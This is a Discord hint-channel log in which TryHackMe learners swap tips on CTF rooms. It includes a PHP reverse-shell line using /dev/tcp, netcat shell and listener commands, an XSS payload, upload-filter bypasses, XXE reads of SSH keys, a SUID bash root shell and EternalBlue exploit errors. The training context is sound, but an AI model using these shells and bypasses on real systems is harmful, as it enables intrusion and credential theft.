#room-hints
May I ask where you got that pepe emoji in your status from?
ssh username@ip
could not resolve hostname

nop can i pm you
Thanks
Gave +1 Rep to @inland cargo
Sure
Hey!
I need some hint for Theseus, I'm stuck with the crypto stuff :///
I think it's rail fence cipher
anybody available for a hint for priv esc on cold vvars room?
It's the title of the room
Check env.
thanks
Gave +1 Rep to @inland cargo
I'm a bit confused on Socat, how do these relays work? I kind of understand it but I'm a bit confused how the shell will be forwarded to the relay if the relay doesn't have the target that we want a shell on in the syntax?
like this diagram, so if I ran i.e. nc 127.0.0.1 8000 -e /bin/bash on a target deeper in the network, the relay would catch that and forward it to the kali machine?
ohhh yeah i think i kinda get it now actually
if i ran a shell on a target with 127.0.0.1 port 8000, and port 8000 is linked to the relay, of course the relay would catch it. Have I understood this right?
I'm at the OWASP T10 at XXE and I'm trying to find a SSH key location.
Afaik I can only read files but not directories. I also can't pass any commands to the parser.
I only know that the directory must be /home/falcon/.ssh/******
Any hints on how to solve this?
Try the default name for private keys

I somehow thought the keys themselves are named private* somewhat
Thanks for the help
You're welcome
I'm always overcomplicating things.
kali also messed my thoughts up cause I was looking for the path over there and saw it was /.ssh/authorized_keys/[keys]
Authorized_keys should be a file though containing the allowed public keys 
Yeah. That reminded me that i should reread SSH stuff 
you should take a look in the .ssh folder for cool files
you are searching for an rsa private key
yep I've done that. the .ssh was an easy guess anyway. I just got confused by not remembering the ssh key names and then overcomplicating things lmao. the whole thing was so obvious but hey, why not waste an hour by needlessly modifying the payload. at least I've seen some different XXE payloads now
Anyone have the walkthrough of attacktive directory
Network Services - Task 10. What is the estimated time of completion using bruteforce? Just in this instance.
The Coldvvars room is so annoying. Times out all the time.
I cannot even connect now, terminated twice and waiting more than 5 mins. The site doesn't show up :/
```text
command: /usr/bin/python -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-6xgk8mn5/wsgiref/setup.py'"'"'; __file__='"'"'/tmp/pip-install-6xgk8mn5/wsgiref/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' egg_info --egg-base /tmp/pip-pip-egg-info-gr1eepq3
cwd: /tmp/pip-install-6xgk8mn5/wsgiref/
Complete output (8 lines):
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/tmp/pip-install-6xgk8mn5/wsgiref/setup.py", line 5, in <module>
    import ez_setup
  File "/tmp/pip-install-6xgk8mn5/wsgiref/ez_setup/__init__.py", line 170
    print "Setuptools version",version,"or greater has been installed."
          ^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("Setuptools version",version,"or greater has been installed.")?
----------------------------------------
ERROR: Command errored out with exit status 1: python setup.py egg_info Check the logs for full command output.
WARNING: You are using pip version 20.2.2; however, version 21.1.3 is available.
You should consider upgrading via the '/usr/bin/python -m pip install --upgrade pip' command.
```
doing this room called ZTH obscure web vulns
but I am facing this issue while installing tplmap
can someone help me
Can you give me a little more indian?
Which stage are you at?
find usernames & pass
I didn't understand the room tags.
Have you tried reading resources on the room tags from the internet?
yes
Try the vuln mentioned in tags
thx.
Looks like you are installing wsgiref in python2 in a python3 environment. The good news is that wsgiref should already be in your python on kali, so you can just delete it from the requirements.txt file. That might not completely solve your issue - the instructions do recommend installing in python2, but you might want to move past doing that.
even if it is available, I am not able to run the script
anyone did theseus?
please, where can I get the flag in root.txt for the CCPENTESTING room
Is it not located in /root ?
in /root
Yeah, tbh I think I just answered the question and moved on. Can't find it on my system, so I guess I didn't bother with it. Shame as it looks useful
I thought that all the things were a good hint...guess not
Try other way to get in. Maybe something easier.
I like challenges, I know that the cipher is rail fence but I can't decode it, maybe I'm not thinking outside the box enough...
Anyone know the best way to exploit sudo -l of /etc/init.d/cron? I'm stuck on this one and yes I'm a rookie lol
gtfobins ?
I didn't see a listing specifically for /etc/init.d/cron
Am I doing something wrong here? It says Hello, doesn't it?
Need Hint Regarding "Overpass"
Can anyone tell me which Owasp top 10 vuln should I test on this?
Hi everyone... I am stuck in Linux Fundamentals Room 3 in the Pre-security path. I try to connect to the MACHINE_IP using "ssh tryhack@MACHINE_IP", but it responds that the connection was refused at port 22... I have tried this twice. Twice meaning 2 times {start machine->start attackbox->ssh from attackbox terminal->refused->again ssh->refused->terminate attackbox->terminate machine}. still doesn't help. Any idea?
Start the room machine, and use that vm's ip, not the attackbox ip
ssh tryhackme@"roommachineip"
Are you referring to overpass1?
||if so then you might take a look at bypassing||
in "The find command" how to make perm parameter correct?
"**** / ***** * ***** **** ***** **.***"
in the find command room, shouldn't the 3rd answer be: find / -type d -name "exploits"
The perm parameter does not require quotation marks but a -
"That contains" so you need to prepend and append a globbing character
"exploits" is only a part of name
whatever-exploit-whatever.sh should also be found
not just the file "exploit"
hmm, -o=w also doesn't work, did I misunderstand you?
What room is it?
"The find command"
No -o=w is fine but why are you looking inside /usr/bin ?
oh, idk
thanks)
Anyone have the walkthrough of attacktive directory
Hello. I'm new to the discord so I'm still not very sure on how to approach topics on here (despite having read the rules and introduction)
I'm currently doing the Complete Beginner Path -> Network Exploitation Basics -> Network Services -> Task 6: Enumerating Telnet -> question 6.
I'm not sure on how to express some of my doubts or ask for a very gray hint on the subject so I'll just say this for now :/
Something someone may use to gain unauthorised access
i think it's even mentioned in the scan if you read through it
@astral smelt Thank you for the hint! Some answer templates really confuse me and I start to do research on my own doubts. Thank you again
Gave +1 Rep to @astral smelt
On the Kali Linux terminal, how do I know the openvpn is connected or not? The last line I see is "Initialization Sequence Completed"
And then blank. Nothing of the sort like showing a directory or something. The line below is blank, though it accepts cursor input... I tried the room https://tryhackme.com/room/openvpn. It helped for Windows, but nothing much for Kali Linux. Am I missing something? Please help.
I tried entering ssh tryhackme@"IP", but it still stayed blank after that input... then I "ctrl+c"-ed to come back to the terminal default operation of showing the working directory.
you will need to open another terminal, in order to connect if you didn't put your openvpn on background
normally with "ip a" you will see a tun0 interface with your current IP on the VPN
You mean I can't work on the same terminal? Wait let me try once...
sudo openvpn xxx.ovpn &
if you want to have it in the same terminal
it will go in background as a job
Can I text you personally N1M, if you don't mind? I think I would like to clarify a few things too that I didn't mention, don't wanna mess the room up
yes you can
Hi guys..I'm stuck on SteelMountain. How can you replace a file that runs? I can't kill the process as i don
as i dont have permission*
stop the service
Stuck on my first CTF practice. Stuck on Root Me CTF, trying to upload reverse shell. No matter what I put in the file with PHP/reverse shell, I don't see anything on the listener
Which php shell are you using and what file extension?
stand by lol
||<?php
exec("sudo /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
extension shell.php.jpg||
(i'm pretty sure I don't know what I'm doing)
Hmm shell should work else give the pentestmonkey php shell a try ||and dont use jpg as the file extension but an alternative php extension||
like ||php3||, etc what I've been seeing?
yea that'd be one example
...do I literally just upload this? haha
changing with your ip should be fine
looks like it just goes through a bunch of methods?
Adjust the IP and port and then you are ready to go
okay cool, i saw those in the file a second ago
hmm
doesn't seem to work using either open port
Which port are you using?
You should do the "What the shell" room or what it was called on THM
fucking 80
you obviously can't use 22 because that's used by SSH already
is that a shell room?
use 4444 for example
ohhh
on your local machine you need to : nc -lvnp 4444
okay
matching the one in the php file
okay
I don't need to escalate privileges yet, do I
yes you will need following the next question : https://www.tecmint.com/how-to-find-files-with-suid-and-sgid-permissions-in-linux/
okay cool that's what I was thinking
[SOLVED] I would like to request a hint for Network Services room on task 4(Exploiting SMB), at the end question with the flag. I have to figure out the username of this particular person in order to ssh into the work server. But it seems I'm brute forcing at this point and I'm wondering if there is somewhere I should be looking where I haven't already.
Where I looked so far: ||the .txt document in the profiles share only so far. Another share is open but that doesn't seem to contain anything. There was one .txt file where I picked up the name of a person and I already picked up the identity file for use with SSH service. I keep receiving a port 22 connection close with every different concatenation of the person's name as username for ssh.||
Any tip on Revenge room?
I only got the first flag down, and I have the database dump but I don't seem to know what to do if the password encryption is secure against lookups
Nevermind finally bruteforced one user found the password
can anyone give me a nudge on coldvvars room for foothold? I did everything i can on enumeration and still not able to get a way in (i can tell you more on what I have done till now in the dms)
For SteelMountain, would you use the AbuseFunction (from running Invoke-AllChecks) to replace the file with the one generated from msfvenom?
I'm doing the Upload Vulns room, for client side filtering, I viewed the source code but it doesn't show anything saying file type. How do I know what file type is available on the website then?
If you cannot gain information from the javascript source code it's simply trying until you find it
Okay, I did try it using an extension that is allowed, but even if I successfully uploaded the file to the server, there is still no response saying the MIME type
If its the task I'm thinking of, are you capturing all the responses from the server in Burp? You might find the info in one of them
Yeah im capturing the responses
It doesn't come out as the ones said in the module..at least
One of the responses should be the JavaScript file. Let me boot my laptop up. What task is this?
Ahhh, did you go into options > intercept client requests and remove the reference to ^js$|
You might have to force refresh the page as well
Do i have to do that before i intercepted the first response or after I uploaded the file?
Before the first response if i recall
That's weird. still invalid lol
Want to drop into DM and talk it through?
sure
Web fundamentals XSS Task three part 5, Jack's cookie. Every time I paste the script in it goes to a web page not found, and then I can't go back to the original page? The cookie in the url doesn't work. Burp gives me an attacker error
i get no hints about logs either
You could, but that is not the path the room author suggests.
Hmmm ok I know it says to replace the executable, but I don't have permissions even after running PowerUp.ps1. I try to rename the service's exe file to replace with the Advanced.exe from the GitHub, but it says I don't have permissions. I'll just keep messing with it, thanks (also I stopped the service before attempting to make changes)
Gave +1 Rep to @queen cliff
Something sounds not quite right with your approach. A few quick hints that may be helpful: (1) Note the PowerUp script is just for Invoke-AllChecks (in other words, information-gathering; has nothing to do with changing permissions on anything), (2) You can directly ascertain file permissions within meterpreter (where you should find you already have all the permissions you need to replace the file), (3) Why are you getting Advanced.exe from GitHub? Aren't you supposed to generate a payload with msfvenom in this room?
I'm also on the client-side uploadvulns thing, and it seems like my Burp is just freezing after I press forward? It's just blank
I see, thanks that helps a lot. Yes I generated it with msfvenom sorry I got the rooms confused a bit.
Gave +1 Rep to @queen cliff
Hi, I'm having issues with the File Upload Vulns room in task 7. I intercepted the request and sent a response on client-side js; the response only shows file.type but nothing of name="fileToUpload" where I can change the file extension. How do I work my way around this?
and selecting another file extension from earlier doesn't seem to work either. It says "invalid file type"
Thanks @vital crown
Gave +1 Rep to @vital crown
Hi Sea_Bas, did you solve task3 for CCT2019?
doing Juice Shop Room, Task 7 - Not getting anything after entering the JS XSS alert snippet, am I supposed to? Question #2 prompts for an answer or flag but I don't see any generated or any next steps
I am having trouble in the THM upload vulnerabilities room, the last challenge. After uploading the shell in the format of jpg, when I am going to execute it through the admin page it shows "module does not exist". plz help
Do not modify anything that gets checked on the client-side
Anything?
Are there any tools I can use in Kali Linux to find the function with ASLR/DEL disabled in https://tryhackme.com/room/brainstorm. and how would I know it actually has ASLR disabled?
I wouldn't use Kali for debugging as it is a Windows binary file
@rain latch and any tools or debuggers you can recommend?
Immunity Debugger, you can then use mona to find such functions
@rain latch I tried using it, but it told me the binary was invalid or something. Is it purposed to be debugged with a 32 bit version on Immunity Debugger?
Can you run the binary itself?
@rain latch I can't. I am prompted that it's incompatible with 64 bit versions of Windows.
You probably got the file via FTP right?
@rain latch exactly
Take a look at the binary mode of FTP, this will help you and fix the problem
alright. I'll try it again. thanks @rain latch
Gave +1 Rep to @rain latch
You're welcome
Binary - Shiba1, I created noot.txt and when I did ~/noot.txt it said I don't have permission to it
any hints?
you need to run the file in folder
there should have been a binary already in the folder that you need to run after you create the noot.txt
just ./shiba1
then you're not in the correct dir where the binary is
How do I go there if so
you find where the file is and navigate to that directory
or you call the binary with absolute path
don't know how
you should have created the noot.txt in the home directory, the shiba1 is in the same dir
when you run the shiba1 binary it should work then
it doesn't...
when I tried to locate shiba it gave no response
when I located noot it just said it's in root/
@fleet spire I would strongly recommend getting a grasp of operating system fundamentals like listing and finding files, switching working directory and lots of other concepts before trying more advanced concepts like exploitation
man ls
man find
pwd, cd and other commands
Can anyone help out on a Golang server? I'm working on an assessment and never have done one before. Thanks.
Network Services-Task 9 Enumerating FTP.
My NMAP scan shows only 1 port open, the answer box says I'm wrong. Could someone check I am not going crazy please?
Try -p- for all ports?
I'll give it a go, not hopeful though as the one it didn't find is a well known port
Did you run nmap a 2nd time? It's possible that it missed it
I did, and it found it. Is that pretty common for nmap to miss it? That could get quite tedious when scanning all ports.
I am using the attackbox mind, would it be quicker on my own kali box?
Thanks for the help @nop @woven nest
Gave +1 Rep to @woven nest
@woven nest thanks!
@random furnace no prob!!
I'm in room CC:Pen Testing and I'm stuck at section 7, getting the root.txt flag. I have acquired the user.txt flag and tried the privilege escalation script to gain access to root but got no luck. Any hints pls?
hello I am trying to get access to eternal blue but I am constantly getting this
Exploit completed, but no session was created.
room: eternal blue
Hi everyone
I was working on the Pickle Rick room, and was stuck on the 2nd ingredient. Was hoping if I could get any hint :3
I guess this is the right room to ask this
Check your options, particularly IP addresses and ports
have you gotten into the machine? enumerate the file system, it will be easily visible..
Yeah I have found the first ingredient, also read the clue.txt file
Hello, I need some help with That's The Ticket
Checked the home directory of the user?
Please someone help with this "Pickle Rick room"
I've tried all sorts..
I'm suspecting x-forwarded-for http header for the 403 dir but yet, I can't even bypass the stuff:sob: :sob:
Please hint me up, I hate write-ups:sweat_smile:
Hello! Can anyone help me with my last question needed to complete OSQUERY? It's Task 9 Q5, schema for event log data. I thought i had it correct, but it wasn't accepting my answer, so I looked more in depth at the answer format. It seems I'm 6 characters off at the end, but I'm at a loss for what they could be. I have the fields and the types all there, but there's a whole extra word at the end that I can't figure out.
You may DM it to me and I'll check for you.
checked .... still not working ..
All solved.
Howdy, I'm in the Practical - Network Simulator part of "Extending Your Network" and the site asks you to send a TCP request from computer 1 to computer 2. Doesn't seem to do anything no matter what I select. Any hints?
Yes, in the home directory itself I found the first one. And there is even a clue.txt file which says to look in the file system to find the 2nd one. The problem is I can't navigate myself out of the home directory. cd or cat doesn't work.
You got the rev shell? Or using portal?
can anyone tell me what the problem might be ?
Using portal
I already did it.... I'm following the rooms
would be better if you asked in #room-help with screenshot + additional info
Any hints for riddlemethis question 2? I know what it is but still can't work it out. (even automated doesn't work)
Anyone working in Diana initiative CTF??
Anyone working on Linux Fundamental part 3 please
Why do you want to analyze it on Linux?
it is a windows binary
Yea it is a windows executable running on a linux machine
yea
you're welcome
Get a reverse shell first then
It will be easy then
yo wz poppin I need help on the room GamingServer, I've got the user flag but I dunno the next step, can someone push me in the right direction?
Okay then. I found the 2nd one. I guess I will find the 3rd one by using the reverse shell. Thanks for your help
Gave +1 Rep to @tulip mural
I have a question about subnets. As far as I know, they're a network in a network (as the name suggests). I'm always confused by this sort of stuff though where it asks to write out the ip. Could someone help me understand this a bit better or point me in the right direction please? Thank you in advance 
You split the network and client scope of a network, an ipv4 address has 32 bits, with the /** you tell how many bits are for the network
/24 means a subnet mask like 255.255.255.0 (binary 11111111.11111111.11111111.0) so in the network 178.18.1.0/24 - 178.18.1. is the network and 178.18.1.1-254 are the clients
Help me with GamingServer root
idk what GamingServer root is
Hi Carbon based lifeforms, I've been stuck on the exploit 42315.py having some errors, can somebody help me? I'm pretty sure the exploit is for python 2, I can't seem to make it work after going around it for a few days (I'm not the best on python, yet)
python3 42315.py 10.10.117.156 1
Target OS: Windows Server 2016 Standard Evaluation 14393
Using named pipe: samr
Traceback (most recent call last):
File "/home/odcr/Desktop/THM/Relevant/42315.py", line 998, in <module>
exploit(target, pipe_name)
File "/home/odcr/Desktop/THM/Relevant/42315.py", line 834, in exploit
if not info['method'](conn, pipe_name, info):
File "/home/odcr/Desktop/THM/Relevant/42315.py", line 489, in exploit_matched_pairs
info.update(leak_frag_size(conn, tid, fid))
File "/home/odcr/Desktop/THM/Relevant/42315.py", line 333, in leak_frag_size
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
File "/home/odcr/Desktop/THM/Relevant/mysmb.py", line 349, in create_nt_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/home/odcr/Desktop/THM/Relevant/mysmb.py", line 73, in _put_trans_data
transData = ('\x00' * padLen) + parameters
TypeError: can only concatenate str (not "bytes") to str
used this one too https://github.com/worawit/MS17-010 same result
python3 zzz_exploit.py 10.10.117.156 1
Target OS: Windows Server 2016 Standard Evaluation 14393
Using named pipe: spoolss
Traceback (most recent call last):
File "/home/odcr/Desktop/THM/Relevant/MS17-010/zzz_exploit.py", line 1057, in <module>
exploit(target, pipe_name)
File "/home/odcr/Desktop/THM/Relevant/MS17-010/zzz_exploit.py", line 835, in exploit
if not info['method'](conn, pipe_name, info):
File "/home/odcr/Desktop/THM/Relevant/MS17-010/zzz_exploit.py", line 490, in exploit_matched_pairs
info.update(leak_frag_size(conn, tid, fid))
File "/home/odcr/Desktop/THM/Relevant/MS17-010/zzz_exploit.py", line 334, in leak_frag_size
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
File "/home/odcr/Desktop/THM/Relevant/MS17-010/mysmb.py", line 349, in create_nt_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/home/odcr/Desktop/THM/Relevant/MS17-010/mysmb.py", line 73, in _put_trans_data
transData = ('\x00' * padLen) + parameters
TypeError: can only concatenate str (not "bytes") to str
Nice
NP Anytime
ah finished gameserver, sometimes your stuff comes per ship and then it may take longer, but finally it has arrived
Just for info, if you wrap the cli output in ``` blocks, it formats it as code and makes it much more readable
Also I'm pretty sure that machine is not vulnerable to that exploit
Also also that exploit is likely written for python3 not python3
Thanks for the tip , that made me go back to my steps and rooted the room fairly fast after
Gave +1 Rep to @ripe hedge
The first line in the script lets the kernel know which shell to use for the script. It's also a good reference on what binary you should execute the script with (e.g. python in this case not python3)
In network services 2, task 4, I managed to get shell as root, but can't seem to find the root flag. What am I missing?
cappucino@polonfs:~$ ./bash -p
bash-4.4#
The rootflag usually is in the /root directory, else you could use the find command to look for it across the filesystem.
Yeah tried that, used python and the output is that mysmb.py is missing even if it's there
how to do this from HTTP in detail, Task 7
The explanation is right there
which is the id parameter?
That's the parameter you have to create
can you tell me the name of the parameter
"id"
thanks I'm dumb
I'm in a room that is called Introductory Networking and I get the question "What kind of protocol is TCP?". I may seem very stupid but could someone help me with this question?
The answer is in the text above the question (or can be found by conducting some simple research about the protocol)
Ok, I'll research it
Thanks, will try that
Gave +1 Rep to @rain latch
Success, thanks!
Gave +1 Rep to @rain latch
You're welcome
Gave +1 Rep to @near flame
hi in the room "network services" at "exploiting SMB" there's a question I'm stuck at: "Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?"
do they ask about what username the profile folder belongs to?
can i get a hint for the picklerick CTF?
so far I've used gobuster to find directories, nmap to scan some ports, and checked the source code for a username, not sure where to go from here.
They are asking for the full name of the person
Think about what you would look at or open while in the SMB Share in order to see a person's name. Is there anything in there that says "Yeah, this will address someone?"
I just did this one the other day :)
I actually did that already thanks!
Look a little more. It's all there you may have just overlooked it.
hmm
I have tried accessing the successfully uploaded PHP reverse shells in Task 9(Magic Numbers) of File Upload Vulnerabilities room and for the majority of extensions I get "The image cannot be displayed because it contains errors" and for ||.phps files I get Forbidden for both /assets and /graphics paths||. I have set up a netcat listening port as well on the default pentestmonkey shell port 1234 but nothing so far.
Any hints would be great thank you.
I referred to my notes and it should be there
Is php uploading allowed? Maybe it blocks uploaded php from functioning?
I can upload .php5 files and other variations of the extension .php, along with the magic numbers string for GIF files the php shells are successfully uploaded but I guess when visiting the shell directly through the URL I receive an error saying it can't display the image but the connection isn't even set up.
Oh for crying out loud
I finally got it! I didn't include the 6 characters before editing in the hex string for the appropriate file signature.
I forgot that step.
jalapenyoo I had the exact same question. Thanks for asking that haha. I am only using 4 digits. Does that make a difference?
Hi everyone, I'm in OWASP Juice Shop task 7 Question #1: Perform a DOM XSS. After searching here and seeing some of the same issues but not finding the answer (I've double checked the question and the input: <iframe src="javascript:alert('xss')">). I get the pop up but no flag. Would someone point me in the right direction?
When I copy and paste into my browser and not manually input it in the browser kali box, I got the flag. I'm still confused because I don't see a difference.
Nevermind, wrong character... DOH
I want to say yes because in the jpeg example magic numbers the string was 4 letters which is 4 bytes long the same byte count as the signature for jpeg and so the editing was 4 bytes of hexadecimal digits replacing the already reserved slots that was marked from the ascii AAAAs. So based on the example I think it does matter that how many random alphabet letters you type and so that's why I added 6 As so that it matches the byte size of the file signature in question in the task flag question.
But if you want to double check definitely do 4 only and see if you get an error like I did which would mean you DO need the length being appropriate to the signature of the whitelisted content type.
Anyone having trouble with the Internal Room? When I try to access internal blog I got this page, and I'm not able to access the log-in page properly. Always having issue with Server Not Found.
Add it to your hosts file :)
So I'm on Exploiting SMB and I'm having issues with accessing documents in the profiles share. I'm logged in, I can ls the files, but I'm unsure how to open them to read and google has been of little help. I've tried linux commands nano, cat, etc and the SMB command of "open" but it just tells me file not found.
Also When working with a document with space "Working From Home Information.txt" I try putting underscores where spaces would be but I get the same file does not exist error. Any help?
you need to get the files to your local machine, for the one with spaces have you tried just putting quotes around it
Ahh, so it'd be
get "Working From Home Information" root/Desktop ?
you don't have to put the destination, it will use the folder you are in
Thanks blackdragon, I was thinking about it too much.
Gave +1 Rep to @glacial gust
np
I'm in the Network services section Enumerating Telnet and it asks me what port is open.
I see 3 ports open 22/tcp, 139/tcp and 445/tcp. I put 3. Wrong. I put 1 and it's correct. This is confusing. Now it's asking what port is open looks like 4 characters, but I tried all those ports and it's still not working. I don't see any other ports open via nmap. Very confusing
How many ports did you scan?
I'm doing Pickle Rick room and I am stuck in logging into Rick's computer. I found ||the username and I know there is a ssh service available on Rick's computer however after attempting to brute force password using Hydra I receive an error saying this server doesn't support password authentication and by transition when I ssh using the login name I get an error which I am looking up at the moment, and it means there is public key authentication. But I am stuck here. I also know that id_rsa is the identity file starting with ssh version 2 but that would require it being on the server itself wouldn't it? I have no access to that.||
Just a small hint is fine.
I did that quite a long time ago so I am unsure if anything changed, but you may have hit a rabbit hole. You should enumerate a little more.
enumerate how exactly? enumerate as far as directories would you say? files?
You are thinking along the right path.
DM me if you need anymore hints. I won't be giving you answers
@ashen matrix ok thanks
Gave +1 Rep to @ashen matrix
Found something! haha amazing thanks again!
Room ustoun, I am able to get sql username and password, but cannot get sql shell?
Looking for a nudge on internal, I have shell but think I found a rabbit hole for priv esc
Hi, somebody can gimme hint with "Blue"?
lookup xp_cmdshell as a sql command
So anyone done the metamorphosis room yet?
Hello, I'm on the room "wgel" but I'm stuck on start: I already found ||/sitemap|| and the ||id_rsa file|| but now I can't manage to find ||the user associated with the ssh key||. I already tried to ||use the names of the developers on the "about" page, twist them etc|| but I'm out of options
@hexed fog you need to look a little more
@hexed fog Maybe a webpage might have some information?
Also tried ||the guy from the blog||
And ||the people in the templates||
well, I've been spoiled when looking for hints but I don't want to go further till I understand what to look for, so I'll just continue searching, and if you have any hint on where to look I'd appreciate it
@hexed fog Maybe go beyond the front face of a webpage. Looks at how the webpage is formed. Make sense?
I am trying to give you hints without straight up saying where to look lol
well, it's just a ||template website|| so i don't see what could be interesting in there
ok maybe my hint wasnt right. maybe you should look at the webpage source code
even on the ||contact page|| there's nothing useful
I have told you where to look, the rest is up to you to find it. I referred to my notes and I detailed how I found what you're looking for.
yes thx, i'm looking for || made by XXX or something that'd mention the author||
but looking at each div is pretty boring xD
Are you talking about when you start a machine in a room?
Hey, I was solving Attacktive directory Room.
For getting a full-control on the AD-Domain, I can either use Evil-WinRM (as suggested in THM room) or impacket toolkit named psexec.py ...
yeah
But I noticed after using both of them to test, that each of them produces different type of shell
psexec.py produced: nt authority\system
Evil-WinRM produced: thm-ad\administrator
Any Help??
You need to use either the attackbox that is built in or download a VM version of Kali Linux or Parrot OS. There are rooms in THM that can guide you through it and I recommend you start there if you are unsure how to proceed
i just downloaded openvpn
would that work?
You would also need to download a variety of enumeration tools and other binaries used to decrypt and brute force, etc.
I would highly recommend you search for a THM room that is about setting up Kali Linux or using the built in attack box on how to start with TryHackMe
i dont use linux
Then I cant help you sorry
np. I recommend you learn Linux, plenty of rooms on THM to help. I didn't use Linux when I first started as well
I'm talking about this...
You won't need to login to the ssh. That is a kind of rabbit hole. This is the biggest hint I could give you at the moment.
It was answered already but thanks anyway
You can download a Kali Linux VM and you should learn a bit of the Linux commands, as learning them and using linux in general would make it easy for you to complete the rooms. To learn linux, you can try Bandit from OverTheWire. It's pretty good for beginners.
I saw that just now. :'3 nvm :3
Any help??
VulnUniversity : room
The operating system question is wrong, tried linux, windows, linux
any idea
name of the operating system
yes
What is the most likely operating system this machine is running?
nmap scan should give you the answer if I'm not mistaken
what flag you use to scan
-O
in one of the service found, is there like a name of linux thing?
I am sure it's Windows, because port 445 microsoft-smb
nope
All done, OS is not predictable by nmap
I dont mean to be rude, but you know there are "variations" of linux, right? there is this linux, that linux, and so on
in one of the port found by nmap, if I remember correctly there should be hint what one of the program is running from
I can't give you too much of a hint, since it's pretty much an instant answer
okk
dm if you need more help
sure
THank you, but I could not upload any executable although I was able to get smbshell with what you suggested.
I will give it another shot later tonight and will ping you if necessary.
Thanks again. @glacial gust
Regular expressions
it seems to be working, but the answer is incorrect.
need hint how to pass this task)
same here(
try (c|h)
let me check
no, | is shown in next task
[ch] then
thank you)
be a bit more literal on that one
ahah, ok. got it
yours works as well
does ^ work as beginning of line and as 'not' simultaneously, or does it have to be \D
it worked, but it seems to me there has to be \D
it might be case sensitive in this room
understandable )
initial nudge on Metamorphosis?
Anyone completed internal? I'm stuck on priv esc
I'm avoiding watching the video walkthrough but… I'm stuck right now haha
should be an internal service lying around
I had to use the video but I learned tools don't always help and you need to look with your eyes… sometimes stupid files are left around
I already had the internal service, and shell on the box and the service
I don't use Linux
which room
A private hackathon.. we have that question at the end
First time here, not sure if this is the right room or not. Please read my question below.
My issue is I'm not seeing the answer they want in the title that was returned to me. NMAP Command run is "nmap -A [IP]"
Based on the title returned to us, what do we think this port could be used for?
Room is "Network Services"
which section
Did you do -p- for all ports? If not see if that can get you more ports
I did -p- for all ports and it returned "8012" as the open port. The second question says "Now re-run the Nmap scan, without the -p- tag, how many ports show up as open?" 0 showed up as open. Now, the question I have the issue with is "Based on the title returned to us, what do we think this port could be used for?"
Enumerating Telnet. (Now re-run the nmap scan, without the -p- tag, how many ports show up as open?)
your -p- scan should have given you some details in the output that should provide the answers you need for the 6th and 7th questions
That's the problem I have.... It's not showing me anything useful for the 6th and 7th question
after port 8012, is there any output data with it
Nope
try the -vv switch for verbosity level 2
The -A switch includes version scanning I didn't know it'd be different output.
Very cool.
I didn't know that too. I guess we learn everyday.
Thanks a lot
the nmap room covers a lot the switches
I'll make sure to check that out
Hello all, having an issue with Burp Suite Module Task 8. The question: after sending the HTTP POST to the repeater and intruder, what is the error you get when you change the user name and password to '
I tried a few different things and cannot get the right answer
How exactly have you entered the ' in the Repeater window?
Hi folks, would appreciate getting a nudge on Cyborg room. I've run the nmap scan and identified 2 services running - ssh and http. I'm trying to exploit the first one through a user enumeration vulnerability (for about 2 days now), but I'm not sure if it is my wordlist or the vulnerability I'm trying to exploit is the issue.
Didn't want to look at write ups first as I'm trying to develop the mindset
what do you have so far?
Are you using rockyou.txt?
Complete Beginner Path: Web Hacking Fundamentals: Web Fundamentals...
I'm on the mini ctf at the end and I'm not quite sure what to do.
I've made notes on the content of the room and I feel like I understand it pretty well but when it comes to solving the ctf, I'm not sure what to do. I got that to get the first flag I had to do: curl http:// [IP]/ctf/get.
I tried using -X POST to define the kind of request.
I remember reading that the body of the http request didn't matter in GET requests but they do with POST. However, I'm not quite sure I understand how this works.
Any help would be greatly appreciated :)
ok woah I misread the question wow.
Ok got it. That was silly
In Complete Beginner Path: Network Services: Exploiting SMB
Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".
Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server
I'm stuck at this part, don't know which server I'm supposed to log in into
the target vm
ah ok, you grabbed the key, not used it
same VM should also have the service you need
normally you already portscanned the machine
hi all, i trying room of SESH Birthday CTF
i'm hitting the wall to get the username, i have found the password in the totallytopsecret.pdf
however, i'm stuck ---- to get the username
am i in the right path, as the hint mentioned stored address or phone number
I figured it out, I had a - instead of _
Stuck on Burp Suite Task 10, i do not have any from Juice Shop with the set-cookie in the header
Tried running the payload again but still no response to proceed
Did you browse the "happy path"?
Not today i started over
do you know the name of the structure where burp suite holds the requests from browsing/spidering a web application? That's my hint in conjunction with the happy path.
The http history tab
Trying privesc on retro… should wesng or windows-exploit-suggester help here? Winpeas seems useless for this
That is one where requests are listed but you might find some more info of what I am specifically talking about in Task 7
Im on the last part of Task 10 i never got a set cookie response in the http history tab
Right you need to find that and so I'm trying to give you another area to look in and so let me ask you this: do you know what we use to navigate when we are on the road driving for example?
There are lots of app services that provide this like Google is a big one that provides this
Maps
Correct!
So in Task 7 you'll find this word being used and you'll know where to look.
Task 7 tells you where to look for you to complete Task 10. It's not the only place where you could look as you are looking in the History tab too but it's the best place I think.
And don't forget to check the responses and not the requests for the Set-Cookie header since it is a http response header.
Thank you!
@white salmon so I sent it to sequencer and running it. Pause it at analyze now. Then burp suite closes down
I guess you'll have to browse the happy path again
I got it! Thank you for the hints!
awesome! np
Hey there, I'm working on the network service room and I'm stuck on the telnet enumeration task, it's supposed to have a port open, but scanned the target vm using -sS -sT -sA -sN -sF -sX and -sU and they all say that all ports are closed. Am I being dumb or am I being dumb?
How many ports did you scan? -p- scans all ports on a target machine. Also -vv for verbosity helps a great ton. Lots of information there.
Make sure to scan all ports with "-p-"
good evening people :)
